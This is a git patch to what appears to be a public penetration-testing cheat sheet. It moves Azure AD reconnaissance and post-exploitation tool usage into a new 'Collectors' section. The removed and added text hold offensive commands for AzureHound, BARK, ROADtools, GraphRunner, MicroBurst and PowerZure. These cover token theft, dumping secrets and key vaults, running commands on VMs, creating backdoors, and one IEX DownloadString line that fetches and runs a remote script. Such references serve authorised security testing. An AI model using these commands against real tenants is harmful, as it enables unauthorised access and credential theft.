From 0dd1cc6ac637e24a7d7bd162d577f03e8ca71c05 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Fri, 1 Dec 2023 15:34:14 +0100
Subject: [PATCH] Azure AD - Collectors
---
 docs/cloud/azure/Cloud - Azure Pentest.md | 152 ----------------------
 docs/cloud/azure/azure-enumeration.md | 40 +++++-
 2 files changed, 38 insertions(+), 154 deletions(-)
 delete mode 100644 docs/cloud/azure/Cloud - Azure Pentest.md
diff --git a/docs/cloud/azure/Cloud - Azure Pentest.md b/docs/cloud/azure/Cloud - Azure Pentest.md
deleted file mode 100644
index c60ee5b..0000000
--- a/docs/cloud/azure/Cloud - Azure Pentest.md
+++ /dev/null
@@ -1,152 +0,0 @@ -## Azure Recon Tools - -* [**BloodHoundAD/AzureHound**](https://github.com/BloodHoundAD/AzureHound) - Azure Data Exporter for BloodHound - ```powershell - # First, retrieve a refresh token (-r) if username/password isn't supported. - # An access token (-j) isn't recommended because it can expire before the end of azurehound execution - Install-Module AADInternals -Scope CurrentUser - Import-Module AADInternals - $rt = (Get-AADIntAccessToken -ClientId "1950a258-227b-4e31-a9cf-717495945fc2" -Resource "https://graph.microsoft.com" -PRTToken (Get-AADIntUserPRTToken) -IncludeRefreshToken $true)[1] - - # Second, launch azurehound collector - ./azurehound -r "0.AXMAMe..." list --tenant "753a0bc5-..." -o output.json - - ## Connects on your Azure account using the refresh token provided and the tenant of the account - ## and collects every possible objects in contoso.microsoft.com. Results are stored in json - ./azurehound -r $rt --tenant "contoso.onmicrosoft.com" list -o azurehound-scan.json --tenant "contoso.microsoft.com" - ## Sets configuration file with connection variables and other things (not required) - ./azurehound configure - ## Collects every objects on all accessible tenants using username/password and prints it to stdout - ./azurehound -u "MattNelson@contoso.onmicrosoft.com" -p "MyVerySecurePassword123" --tenant "contoso.onmicrosoft.com" list - ## Collects every objects on a specific tenant using username/password and stores it in json - ./azurehound -u "phisheduser@contoso.onmicrosoft.com" -p "Password1" list -o initial-scan.json --tenant "contoso.onmicrosoft.com" - ## Collects every objects on all tenants accessible using Service Principal secret - ./azurehound -a "6b5adee8-..." -s "" --tenant "contoso.onmicrosoft.com" list - ## Collects AzureAD info (all except AzureRM info) using JWT access token - ./azurehound -j "ey..." 
--tenant "contoso.onmicrosoft.com" list az-ad - ## Collects every users using refresh token - ./azurehound -r "0.ARwA6Wg..." --tenant "contoso.onmicrosoft.com" list users - - # List of collections - az-ad: Collect all information available at the AzureAD tenant level. In most tenants, all users have the ability to read all this information by default. - az-rm: Collect all information available at the AzureRM subscription level. Users do not by default have read access to any of this information. - - apps: Collects AzureAD application registration objects. - devices: Collects AzureAD devices regardless of join type. - groups: Collects AzureAD security-enabled groups, both role eligible and non role eligible. - key-vaults: Collects AzureRM key vaults. - management-groups: Collects AzureRM management group objects - resource-groups: Collects AzureRM resource group objects - roles: Collects AzureAD admin role objects - service-principals: Collects AzureAD service principals - subscriptions: Collevts AzureRM subscriptions - tenants: Collevts AzureAD tenant objects - users: Collects AzureAD users, including any guest users in the target tenant. - virtual-machines: Collects AzureRM virtual machines - - # GUI access - bolt://localhost:7687 - Username: neo4j - Password: BloodHound - - # Custom Queries : https://hausec.com/2020/11/23/azurehound-cypher-cheatsheet/ - # Cypher query examples: - MATCH p = (n)-[r]->(g:AZKeyVault) RETURN p - MATCH (n) WHERE n.azname IS NOT NULL AND n.azname <> "" AND n.name IS NULL SET n.name = n.azname - ``` -* [**BloodHoundAD/BARK**](https://github.com/BloodHoundAD/BARK) - BloodHound Attack Research Kit - ```ps1 - . 
.\BARK.ps1 - $MyRefreshTokenRequest = Get-AZRefreshTokenWithUsernamePassword -username "user@contoso.onmicrosoft.com" -password "MyVeryCoolPassword" -TenantID "contoso.onmicrosoft.com" - $MyMSGraphToken = Get-MSGraphTokenWithRefreshToken -RefreshToken $MyRefreshTokenRequest.refresh_token -TenantID "contoso.onmicrosoft.com" - $MyAADUsers = Get-AllAzureADUsers -Token $MyMSGraphToken.access_token -ShowProgress - ``` -* [**ROADTool**](https://github.com/dirkjanm/ROADtools) - The Azure AD exploration framework. - ```powershell - pipenv shell - roadrecon auth [-h] [-u USERNAME] [-p PASSWORD] [-t TENANT] [-c CLIENT] [--as-app] [--device-code] [--access-token ACCESS_TOKEN] [--refresh-token REFRESH_TOKEN] [-f TOKENFILE] [--tokens-stdout] - roadrecon gather [-h] [-d DATABASE] [-f TOKENFILE] [--tokens-stdin] [--mfa] - roadrecon auth -u test@.onmicrosoft.com -p - roadrecon gather - roadrecon gui - ``` -* [**Azure/StormSpotter**](https://github.com/Azure/Stormspotter) - Azure Red Team tool for graphing Azure and Azure Active Directory objects - ```powershell - # session 1 - backend - pipenv shell - python ssbackend.pyz - - # session 2 - frontend - cd C:\Tools\stormspotter\frontend\dist\spa\ - quasar.cmd serve -p 9091 --history - - # session 3 - collector - pipenv shell - az login -u test@.onmicrosoft.com -p - python C:\Tools\stormspotter\stormcollector\sscollector.pyz cli - - # Web access on http://localhost:9091 - Username: neo4j - Password: BloodHound - Server: bolt://localhost:7687 - ``` -* [**Microsoft Portals**](https://msportals.io/) - Microsoft Administrator Sites -* [**nccgroup/Azucar**](https://github.com/nccgroup/azucar.git) : Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks. 
- ```powershell - # You should use an account with at least read-permission on the assets you want to access - PS> Get-ChildItem -Recurse c:\Azucar_V10 | Unblock-File - PS> .\Azucar.ps1 -AuthMode UseCachedCredentials -Verbose -WriteLog -Debug -ExportTo PRINT - PS> .\Azucar.ps1 -ExportTo CSV,JSON,XML,EXCEL -AuthMode Certificate_Credentials -Certificate C:\AzucarTest\server.pfx -ApplicationId 00000000-0000-0000-0000-000000000000 -TenantID 00000000-0000-0000-0000-000000000000 - PS> .\Azucar.ps1 -ExportTo CSV,JSON,XML,EXCEL -AuthMode Certificate_Credentials -Certificate C:\AzucarTest\server.pfx -CertFilePassword MySuperP@ssw0rd! -ApplicationId 00000000-0000-0000-0000-000000000000 -TenantID 00000000-0000-0000-0000-000000000000 - # resolve the TenantID for an specific username - PS> .\Azucar.ps1 -ResolveTenantUserName user@company.com - ``` -* [**FSecureLABS/Azurite Explorer**](https://github.com/FSecureLABS/Azurite) and **Azurite Visualizer** : Enumeration and reconnaissance activities in the Microsoft Azure Cloud. - ```powershell - git submodule init - git submodule update - PS> Import-Module AzureRM - PS> Import-Module AzuriteExplorer.ps1 - PS> Review-AzureRmSubscription - PS> Review-CustomAzureRmSubscription - ``` -* [**NetSPI/MicroBurst**](https://github.com/NetSPI/MicroBurst) - MicroBurst includes functions and scripts that support Azure Services discovery, weak configuration auditing, and post exploitation actions such as credential dumping - ```powershell - PS C:> Import-Module .\MicroBurst.psm1 - PS C:> Import-Module .\Get-AzureDomainInfo.ps1 - PS C:> Get-AzureDomainInfo -folder MicroBurst -Verbose - ``` -* [**cyberark/SkyArk**](https://github.com/cyberark/SkyArk) - Discover the most privileged users in the scanned Azure environment - including the Azure Shadow Admins. 
- Require: - - Read-Only permissions over Azure Directory (Tenant) - - Read-Only permissions over Subscription - - Require AZ and AzureAD module or administrator right - - ```powershell - $ powershell -ExecutionPolicy Bypass -NoProfile - PS C> Import-Module .\SkyArk.ps1 -force - PS C> Start-AzureStealth - PS C> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cyberark/SkyArk/master/AzureStealth/AzureStealth.ps1') - PS C> Scan-AzureAdmins -* [**hausec/PowerZure**](https://github.com/hausec/PowerZure) - PowerShell framework to assess Azure security - ```powershell - # Require az module ! - $ ipmo .\PowerZure - $ Set-Subscription -Id [idgoeshere] - - # Reader - $ Get-Runbook, Get-AllUsers, Get-Apps, Get-Resources, Get-WebApps, Get-WebAppDetails - - # Contributor - $ Execute-Command -OS Windows -VM Win10Test -ResourceGroup Test-RG -Command "whoami" - $ Execute-MSBuild -VM Win10Test -ResourceGroup Test-RG -File "build.xml" - $ Get-AllSecrets # AllAppSecrets, AllKeyVaultContents - $ Get-AvailableVMDisks, Get-VMDisk # Download a virtual machine's disk - - # Owner - $ Set-Role -Role Contributor -User test@contoso.com -Resource Win10VMTest - - # Administrator - $ Create-Backdoor, Execute-Backdoor - ``` -* [**dafthack/GraphRunner**](https://github.com/dafthack/GraphRunner) - A Post-exploitation Toolset for Interacting with the Microsoft Graph API \ No newline at end of file diff --git a/docs/cloud/azure/azure-enumeration.md b/docs/cloud/azure/azure-enumeration.md index 0131259..a623752 100644 --- a/docs/cloud/azure/azure-enumeration.md +++ b/docs/cloud/azure/azure-enumeration.md 
@@ -2,16 +2,52 @@
 ## Azure AD - Collectors
-* roadrecon
+* [**Microsoft Portals**](https://msportals.io/) - Microsoft Administrator Sites
+* [**ROADTool**](https://github.com/dirkjanm/ROADtools) - A collection of Azure AD tools for offensive and defensive security purposes
 ```ps1
 roadrecon auth --access-token eyJ0eXA...
 roadrecon auth --prt-cookie -r msgraph -c "1950a258-227b-4e31-a9cf-717495945fc2"
 roadrecon gather
+ roadrecon gui
 ```
-* AzureHound
+* [**BloodHoundAD/AzureHound**](https://github.com/BloodHoundAD/AzureHound) - Azure Data Exporter for BloodHound
 ```ps1
 ./azurehound --refresh-token list --tenant "" -o output.json
+ ./azurehound -u "@contoso.onmicrosoft.com" -p "" list groups --tenant ".onmicrosoft.com"
+ ./azurehound -j "" list users --tenant ".onmicrosoft.com"
 ```
+* [**BloodHoundAD/BARK**](https://github.com/BloodHoundAD/BARK) - BloodHound Attack Research Kit
+ ```ps1
+ . .\BARK.ps1
+ $MyRefreshTokenRequest = Get-AZRefreshTokenWithUsernamePassword -username "user@contoso.onmicrosoft.com" -password "MyVeryCoolPassword" -TenantID "contoso.onmicrosoft.com"
+ $MyMSGraphToken = Get-MSGraphTokenWithRefreshToken -RefreshToken $MyRefreshTokenRequest.refresh_token -TenantID "contoso.onmicrosoft.com"
+ $MyAADUsers = Get-AllAzureADUsers -Token $MyMSGraphToken.access_token -ShowProgress
+ ```
+* [**dafthack/GraphRunner**](https://github.com/dafthack/GraphRunner) - A Post-exploitation Toolset for Interacting with the Microsoft Graph API
+ ```ps1
+ Invoke-GraphRecon -Tokens $tokens -PermissionEnum
+ Invoke-DumpCAPS -Tokens $tokens -ResolveGuids
+ Invoke-DumpApps -Tokens $tokens
+ Get-DynamicGroups -Tokens $tokens
+ ```
+* [**NetSPI/MicroBurst**](https://github.com/NetSPI/MicroBurst) - MicroBurst includes functions and scripts that support Azure Services discovery, weak configuration auditing, and post exploitation actions such as credential dumping
+ ```powershell
+ PS C:> Import-Module .\MicroBurst.psm1
+ PS C:> Import-Module .\Get-AzureDomainInfo.ps1
+ PS C:> 
Get-AzureDomainInfo -folder MicroBurst -Verbose
+ ```
+* [**hausec/PowerZure**](https://github.com/hausec/PowerZure) - PowerShell framework to assess Azure security
+ ```powershell
+ PS C:> Import-Module .\Powerzure.psd1
+ PS C:> Set-Subscription -Id [idgoeshere]
+ PS C:> Get-AzureTarget
+ PS C:> Get-AzureInTuneScript
+ PS C:> Show-AzureKeyVaultContent -All
+ ```
+* [**Azure/StormSpotter**](https://github.com/Azure/Stormspotter) - :warning: This repository has not been updated recently - Azure Red Team tool for graphing Azure and Azure Active Directory objects
+* [**nccgroup/Azucar**](https://github.com/nccgroup/azucar.git) - :warning: This repository has been archived - Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks.
+* [**FSecureLABS/Azurite Explorer**](https://github.com/FSecureLABS/Azurite) - :warning: This repository has not been updated recently - Enumeration and reconnaissance activities in the Microsoft Azure Cloud.
+* [**cyberark/SkyArk**](https://github.com/cyberark/SkyArk) - :warning: This repository has not been updated recently - Discover the most privileged users in the scanned Azure environment - including the Azure Shadow Admins.
 ## Azure AD - User Enumeration